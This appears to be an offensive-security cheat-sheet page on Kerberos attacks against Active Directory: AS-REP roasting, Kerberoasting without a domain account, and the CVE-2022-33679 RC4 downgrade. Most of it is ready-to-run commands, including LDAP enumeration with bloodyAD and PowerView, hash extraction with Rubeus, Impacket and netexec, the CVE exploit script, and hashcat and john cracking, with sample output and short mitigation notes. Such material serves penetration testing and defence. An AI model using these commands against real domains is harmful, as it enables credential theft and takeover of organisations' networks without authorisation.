# Roasting - ASREP Roasting > If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting **Requirements**: * Accounts with the attribute **DONT_REQ_PREAUTH** * Windows/Linux: ```ps1 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName ``` * Windows only: ```ps1 PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose ``` * [Rubeus](https://github.com/GhostPack/Rubeus) ```powershell C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast [*] Action: AS-REP roasting [*] Target User : TestOU3user [*] Target Domain : testlab.local [*] SamAccountName : TestOU3user [*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local [*] Using domain controller: testlab.local (192.168.52.100) [*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user' [*] Connecting to 192.168.52.100:88 [*] Sent 169 bytes [*] Received 1437 bytes [+] AS-REQ w/o preauth successful! [*] AS-REP hash: $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)... ``` * [GetNPUsers](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py) from Impacket Suite ```powershell $ python GetNPUsers.py htb.local/svc-alfresco -no-pass [*] Getting TGT for svc-alfresco $krb5asrep$23$svc-alfresco@HTB.LOCAL:c13528009a59be0a634bb9b8e84c88ee$cb8e87d02bd0ac7a[...]e776b4 # extract hashes root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast root@kali:impacket-examples$ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast ``` * netexec Module ```powershell $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --asreproast output.txt LDAP 10.0.2.11 389 dc01 $krb5asrep$23$john.doe@LAB.LOCAL:5d1f750[...]2a6270d7$096fc87726c64e545acd4687faf780[...]13ea567d5 ``` Using `hashcat` or `john` to crack the ticket. ```powershell # crack AS_REP messages with hashcat root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt root@windows:hashcat$ hashcat64.exe -m 18200 '' -a 0 c:\wordlists\rockyou.txt # crack AS_REP messages with john C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproast ``` **Mitigations**: * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). ## Kerberoasting w/o domain account > In September 2022 a vulnerability was discovered by [Charlie Clark](https://exploit.ph/), ST (Service Tickets) can be obtained through KRB_AS_REQ request without having to control any Active Directory account. If a principal can authenticate without pre-authentication (like AS-REP Roasting attack), it is possible to use it to launch an **KRB_AS_REQ** request and trick the request to ask for a **ST** instead of a **encrypted TGT**, by modifying the **sname** attribute in the req-body part of the request. The technique is fully explained in this article: [Semperis blog post](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/). :warning: You must provide a list of users because we don't have a valid account to query the LDAP using this technique. * [impacket/GetUserSPNs.py from PR #1413](https://github.com/fortra/impacket/pull/1413) ```powershell GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/ ``` * [GhostPack/Rubeus from PR #139](https://github.com/GhostPack/Rubeus/pull/139) ```powershell Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE" ``` ## CVE-2022-33679 > CVE-2022-33679 performs an encryption downgrade attack by forcing the KDC to use the RC4-MD4 algorithm and then brute forcing the session key from the AS-REP using a known plaintext attack, Similar to AS-REP Roasting, it works against accounts that have pre-authentication disabled and the attack is unauthenticated meaning we don’t need a client’s password.. Research from Project Zero : https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html **Requirements**: * Accounts with the attribute **DONT_REQ_PREAUTH** * Windows/Linux: ```ps1 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName ``` * Windows only: ```ps1 PowerView > Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose ``` * Using [CVE-2022-33679.py](https://github.com/Bdenneu/CVE-2022-33679) ```bash user@hostname:~$ python CVE-2022-33679.py DOMAIN.LOCAL/User DC01.DOMAIN.LOCAL user@hostname:~$ export KRB5CCNAME=/home/project/User.ccache user@hostname:~$ netexec smb DC01.DOMAIN.LOCAL -k --shares ``` **Mitigations**: * All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default). * Disable RC4 cipher if possible. # References * [Roasting AS-REPs - January 17, 2017 - harmj0y](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/) * [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61)